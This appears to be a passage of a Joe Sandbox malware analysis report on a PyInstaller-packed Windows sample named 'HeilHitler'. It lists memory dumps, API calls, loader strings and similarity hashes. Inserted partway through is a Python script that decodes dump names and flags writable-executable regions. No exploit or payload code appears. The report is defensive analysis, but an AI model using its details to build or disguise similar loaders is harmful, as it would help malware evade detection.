                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                            • String ID: P%
                                                                                                                                                                                                                                            • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                            • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                            • Instruction ID: 15a930fb3604a091e0071d4d3dfc1e71deb172d3b171f49913c23aa53b7f5003
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C51E726608BA186D6349F36E4181BAB7A1F798B65F004225EFDF83795DF3CD085DB10
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: LongWindow$BlockCreateErrorLastReasonShutdown
• String ID: Needs to remove its temporary files.
• API String ID: 3975851968-2863640275
• Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
• Instruction ID: 8102a2354b22de0beb218e9c40ede504b4c952b5fd5cbce5b8658eff246ae12e
• Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
• Instruction Fuzzy Hash: 5C21B721B08A4281E7418BFAE8561797250FF89F91F585330DE3ED73E9DE2CE5959300
APIs
Memory Dump Source
• Source File: 00000001.00000002.2033758431.00007FFDFAD61000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAD60000, based on PE: true
• Associated: 00000001.00000002.2033713501.00007FFDFAD60000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2033758431.00007FFDFADC4000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2033758431.00007FFDFAE13000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2033758431.00007FFDFAE6C000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2033758431.00007FFDFAE71000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2033758431.00007FFDFAE74000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2034059986.00007FFDFAE75000.00000080.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2034101253.00007FFDFAE77000.00000004.00000001.01000000.00000013.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfad60000_HeilHitler.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
• String ID:
• API String ID: 349153199-0
• Opcode ID: 2c919d68a485a940d5d0ad5c103bd88b2e133b3e89e7b4880588334ffb64ee24
• Instruction ID: 7385981c80336662c3b8f548d41b4c9318ec9d588fa3ad61f853791000a18ab1
• Opcode Fuzzy Hash: 2c919d68a485a940d5d0ad5c103bd88b2e133b3e89e7b4880588334ffb64ee24
• Instruction Fuzzy Hash: 38819E21F1824346F75CAB25AC71AB962A0EF89780F1840B5D96D877DEFE3CE9458700
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: -$:$f$p$p
• API String ID: 3215553584-2013873522
• Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
• Instruction ID: a1e15ba2d683aff4b89c6501d1bc6059eaef906aa9de14d71b9258e8bcd0fd10
• Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
• Instruction Fuzzy Hash: 2B12A372E0C24386FB645E94D1562BD76A2FB50754FC84235E68DA6BC4FF3CE980AB00
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: f$f$p$p$f
• API String ID: 3215553584-1325933183
• Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
• Instruction ID: 566f00aa2c38b411a9e5758c010c0e7eed45ca89efc92fd79a1817dff0e078d3
• Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
• Instruction Fuzzy Hash: FA12B762E0C14386FB245E94E0466B977A1FB80794FD84335E69E97BC4DF3CE484AB00
Strings
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
• Opcode ID: 5f0021a5e06caa1d5927e7faba78de093a7e02f73eeda03f06a6a07f76cf53df
• Instruction ID: 51369ca1f2913a88d74bca2540edec8a31f8be4fd1f1aeef11c464701a6b4028
• Opcode Fuzzy Hash: 5f0021a5e06caa1d5927e7faba78de093a7e02f73eeda03f06a6a07f76cf53df
• Instruction Fuzzy Hash: E841A861B0865282EA10DB91A8076B973A0FF44BC4F844632ED9CE7796DF3CF546A740
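Each Memory Dump Source entry above names its dump with a dotted string such as 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp. The Python below is an editor's example added to this page, not code from the Joe Sandbox report or from Joe Security: it parses those names, groups the dumps per loaded module, and decodes the two fields whose values line up with the Windows PAGE_* protection and MEM_* type constants, which makes it quick to pick out the executable and writable-plus-executable image regions worth pulling down first. The field layout (process index, dump index, dump id, base address, page protection, flags, memory type, module index) is my assumption and is not documented on this page; the sixth field is left undecoded because its meaning is not evident from the data. The sample list is copied from the entries above.

```python
"""Decode Joe Sandbox .sdmp dump names (added example; field layout is an assumption)."""
import re
from collections import defaultdict
from dataclasses import dataclass

# winnt.h PAGE_* protection values as VirtualQuery reports them.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
# winnt.h MEM_* values for MEMORY_BASIC_INFORMATION.Type.
MEMORY_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout: proc.dump.dump_id.base.protection.flags.type.module (flags is not decoded).
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<dump>[0-9a-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<prot>[0-9a-f]{8})\.(?P<flags>[0-9a-f]{8})\."
    r"(?P<mtype>[0-9a-f]{8})\.(?P<module>[0-9a-f]{8})\.sdmp$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Region:
    proc: int
    module: int
    base: int
    protection: str
    mem_type: str
    dump_id: int
    name: str

    @property
    def executable(self) -> bool:
        return self.protection.startswith("PAGE_EXECUTE")

    @property
    def writable_executable(self) -> bool:
        # Pages that can be both written and run: the first place to look for patched or decrypted code.
        return self.protection in ("PAGE_EXECUTE_READWRITE", "PAGE_EXECUTE_WRITECOPY")


def parse_sdmp(name: str) -> Region:
    """Split one dump name into its fields; unknown constant values are kept as hex strings."""
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name!r}")
    prot, mtype = int(m["prot"], 16), int(m["mtype"], 16)
    return Region(
        proc=int(m["proc"], 16), module=int(m["module"], 16), base=int(m["base"], 16),
        protection=PAGE_PROTECTION.get(prot, f"0x{prot:x}"),
        mem_type=MEMORY_TYPE.get(mtype, f"0x{mtype:x}"),
        dump_id=int(m["dump_id"]), name=name.strip(),
    )


def group_by_module(names):
    """Return {(proc, module): [Region, ...]} with each module's regions sorted by base address."""
    groups = defaultdict(list)
    for n in names:
        r = parse_sdmp(n)
        groups[(r.proc, r.module)].append(r)
    return {k: sorted(v, key=lambda r: r.base) for k, v in groups.items()}


def image_base(regions):
    """Lowest base in a module's group; for MEM_IMAGE dumps this is the module's load address."""
    return min(r.base for r in regions)


def writable_executable_regions(names):
    return [r for r in map(parse_sdmp, names) if r.writable_executable]


# Constructed from the Memory Dump Source lines of this report: module 3 is the main EXE image,
# modules 0x13 and 0xF are two DLL images in the same process.
SAMPLE_DUMPS = [
    "00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp",
    "00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp",
    "00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp",
    "00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp",
    "00000001.00000002.2033758431.00007FFDFAD61000.00000040.00000001.01000000.00000013.sdmp",
    "00000001.00000002.2033713501.00007FFDFAD60000.00000002.00000001.01000000.00000013.sdmp",
    "00000001.00000002.2034059986.00007FFDFAE75000.00000080.00000001.01000000.00000013.sdmp",
    "00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp",
]

if __name__ == "__main__":
    for (proc, mod), regions in sorted(group_by_module(SAMPLE_DUMPS).items()):
        print(f"process {proc} module {mod:#x} load address {image_base(regions):#x}")
        for r in regions:
            flag = "  <-- writable+executable" if r.writable_executable else ""
            print(f"  {r.base:#018x}  {r.protection:<24} {r.mem_type}{flag}")
```

Run against the report's own names, the main image at 0x7FF633D60000 comes out as a conventional PE layout (read-only header, one PAGE_EXECUTE_READ code region, read-only and read-write data), while the DLL images at 0x7FFDFAD60000 and 0x7FFDFAF40000 carry PAGE_EXECUTE_READWRITE code regions, which is the set to disassemble first. If the field layout assumption turns out to be wrong for a given report, parse_sdmp raises rather than silently mislabelling a dump.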
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
• Associated: 00000001.00000002.2034579485.00007FFDFAF40000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAF4D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAFA5000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAFB9000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAFC9000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAFDD000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB18C000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB1B9000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB1EA000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB25E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB264000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLastsetsockopt
                                                                                                                                                                                                                                            • String ID: ..\s\crypto\bio\b_sock2.c$o
                                                                                                                                                                                                                                            • API String ID: 1729277954-1872632005
                                                                                                                                                                                                                                            • Opcode ID: 55b9dc58d84091389097999520ee8ef412c939128f98883080a21d6a8e2db22d
                                                                                                                                                                                                                                            • Instruction ID: 05070a034f5d0adcf09504c7ab5e9a48117d94b765d515608eed194cf445d515
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 55b9dc58d84091389097999520ee8ef412c939128f98883080a21d6a8e2db22d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D519F22B0954386F3209F11E424ABE73A0FB81B88F444235EAAD47AEDCF3DE545DB40

APIs
• GetTempPathW.KERNEL32(?,?,00000000,00007FF633D63CBB), ref: 00007FF633D68704
• GetCurrentProcessId.KERNEL32(?,00000000,00007FF633D63CBB), ref: 00007FF633D6870A
• CreateDirectoryW.KERNEL32(?,00000000,00007FF633D63CBB), ref: 00007FF633D6874C
  • Part of subcall function 00007FF633D68830: GetEnvironmentVariableW.KERNEL32(00007FF633D6388E), ref: 00007FF633D68867
  • Part of subcall function 00007FF633D68830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF633D68889
  • Part of subcall function 00007FF633D78238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF633D78251
  • Part of subcall function 00007FF633D62810: MessageBoxW.USER32 ref: 00007FF633D628EA
Strings
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
• String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
• API String ID: 3563477958-1339014028
• Opcode ID: 881e4fca8e19ec4ab2ebb52834f4ac375ff8f2bae867f31c8bf391ae1f14406c
• Instruction ID: 75af0323ff9a80efafbbee8e034c6139ae6b0d248ea7fffc3df1f4c364d7745c
• Opcode Fuzzy Hash: 881e4fca8e19ec4ab2ebb52834f4ac375ff8f2bae867f31c8bf391ae1f14406c
• Instruction Fuzzy Hash: A341A421A1964284FA10ABE5A8672B963A1AF847C1FC05331ED1DFB7DADE3CE545E340

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
• Instruction ID: fb1b30cd20393363f9eab9516b10b03b0fc1f1707cefceac0430de3548b9ee72
• Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
• Instruction Fuzzy Hash: 4CD1D432A08B4186EB20DFA5D5423AD37A0FB54788F900335EE5DA77AADF38E095D740

APIs
• FreeLibrary.KERNEL32(?,?,?,00007FF633D7F0AA,?,?,000001BD40F26958,00007FF633D7AD53,?,?,?,00007FF633D7AC4A,?,?,?,00007FF633D75F3E), ref: 00007FF633D7EE8C
• GetProcAddress.KERNEL32(?,?,?,00007FF633D7F0AA,?,?,000001BD40F26958,00007FF633D7AD53,?,?,?,00007FF633D7AC4A,?,?,?,00007FF633D75F3E), ref: 00007FF633D7EE98
Strings
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
• Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
• Instruction ID: 1c2119cbf279b8d7d58f80f071047de15deef92be4f66182e6d03bbbaf58a44b
• Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
• Instruction Fuzzy Hash: BD412821B29A1281FB15CF96AC126752391BF49BD0F894739DD1DEB7A4EF3CE415A300

APIs
• GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF633D63706,?,00007FF633D63804), ref: 00007FF633D62C9E
• FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF633D63706,?,00007FF633D63804), ref: 00007FF633D62D63
• MessageBoxW.USER32 ref: 00007FF633D62D99
Strings
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: Message$CurrentFormatProcess
• String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
• API String ID: 3940978338-251083826
• Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
• Instruction ID: e887b4e9ee61f3d6761854eb8504e09a25780305fe5106c886124e6aca3dbb07
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 79310832708B4142E7209BA5B8152BA7791BF88B88F810236EF5DE7759EF3CE516D700
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034579485.00007FFDFAF40000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAF4D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFA5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFB9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFC9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFDD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1B9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB25E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB264000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Fiber$Switch$CreateDelete
                                                                                                                                                                                                                                            • String ID: *$..\s\crypto\async\async.c
                                                                                                                                                                                                                                            • API String ID: 2050058302-1471988776
                                                                                                                                                                                                                                            • Opcode ID: 8b47d52157642b3b231a89f983280538087bbf6d36b46edcb8fde1806918482b
                                                                                                                                                                                                                                            • Instruction ID: 748cdb895e4d6e748d65d407dec6bfcbe0e06a4e5f2a74dfa107893dab95548c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b47d52157642b3b231a89f983280538087bbf6d36b46edcb8fde1806918482b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 30A16C32B0AA4385EB25DF15E460A7963A0EF48BC4F488431DAAD4B7E9EF3DE545D700
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF633D6DF7A,?,?,?,00007FF633D6DC6C,?,?,?,00007FF633D6D869), ref: 00007FF633D6DD4D
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF633D6DF7A,?,?,?,00007FF633D6DC6C,?,?,?,00007FF633D6D869), ref: 00007FF633D6DD5B
                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF633D6DF7A,?,?,?,00007FF633D6DC6C,?,?,?,00007FF633D6D869), ref: 00007FF633D6DD85
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF633D6DF7A,?,?,?,00007FF633D6DC6C,?,?,?,00007FF633D6D869), ref: 00007FF633D6DDF3
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF633D6DF7A,?,?,?,00007FF633D6DC6C,?,?,?,00007FF633D6D869), ref: 00007FF633D6DDFF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
